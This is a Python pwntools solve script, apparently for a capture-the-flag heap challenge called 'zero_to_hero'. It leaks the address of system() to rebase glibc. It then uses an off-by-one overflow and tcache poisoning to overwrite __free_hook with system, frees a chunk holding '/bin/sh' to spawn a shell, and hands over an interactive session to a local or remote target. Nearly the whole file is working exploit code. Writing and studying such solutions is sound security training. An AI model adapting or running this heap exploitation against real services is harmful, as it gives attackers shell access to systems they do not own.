#!/usr/bin/env python3
from pwn import *
# Target binary (registering it as context.binary also lets pwntools pick up
# its architecture settings) and the matching C library used for symbol
# lookups; both files are expected next to this script.
elf = ELF('zero_to_hero')
context.binary = elf
glibc = ELF('libc.so.6', checksec=False)
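def get_process():
    """Return a pwntools tube to the target.

    With no command-line arguments the binary is started locally; with
    ``HOST PORT`` a TCP connection to that endpoint is returned.

    Raises:
        SystemExit: when only a host is given (previously this surfaced as a
            bare ``IndexError`` from the tuple unpacking).
        ValueError: when ``PORT`` is not an integer.
    """
    if len(sys.argv) == 1:
        return elf.process()
    # Guard the unpack below so a missing port gives a usage line, not a traceback.
    if len(sys.argv) < 3:
        sys.exit(f'usage: {sys.argv[0]} [HOST PORT]')
    host, port = sys.argv[1], sys.argv[2]
    return remote(host, int(port))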
def alloc(p, size: int, data: bytes):
    """Drive the program's first menu entry: answer ``size`` and then send ``data``.

    Every step waits for the ``'> '`` prompt first. The option and the size are
    sent as full lines; ``data`` is sent as-is, without a trailing newline.
    """
    line_answers = (b'1', str(size).encode())
    for answer in line_answers:
        p.sendlineafter(b'> ', answer)
    p.sendafter(b'> ', data)
def free(p, index: int):
    """Drive the program's second menu entry for slot ``index``.

    Both answers are sent as lines, each after waiting for the ``'> '`` prompt.
    """
    for answer in (b'2', str(index).encode()):
        p.sendlineafter(b'> ', answer)
def main():
    """Run the solve script end to end against a local or remote instance.

    Connects via get_process(), parses the address the program prints after
    its banner, rebases the libc ELF from it, then drives the menu through
    alloc()/free() before handing the tube to the user.
    """
    p = get_process()
    p.sendlineafter(b'So, you want to be a hero?\n', b'y')
    # The program prints an address right after this prefix; read it as hex.
    # int() tolerates the trailing newline recvline() leaves in place.
    p.recvuntil(b"It's dangerous to go alone. Take this: ")
    system_addr = int(p.recvline().decode(), 16)
    # Rebase the library ELF so glibc.sym lookups below yield runtime addresses.
    glibc.address = system_addr - glibc.sym.system
    log.success(f'Glibc base address: {hex(glibc.address)}')
    # Menu interaction sequence; the order of these calls is load-bearing.
    # Sizes are passed as ints and rendered by alloc()/free().
    alloc(p, 0x108, b'AAAA')
    alloc(p, 0x108, b'BBBB')
    alloc(p, 0x0f8, b'CCCC')
    free(p, 1)
    free(p, 2)
    free(p, 0)
    alloc(p, 0x108, b'A' * 0x108)
    free(p, 1)
    alloc(p, 0x0f8, p64(glibc.sym.__free_hook))
    alloc(p, 0x108, b'/bin/sh\0')
    alloc(p, 0x108, p64(system_addr))
    free(p, 1)
    # Hand the connection to the terminal.
    p.interactive()
# Run only when executed as a script, so the helpers can be imported elsewhere
# (e.g. by a test) without starting a process or connection.
if __name__ == '__main__':
    main()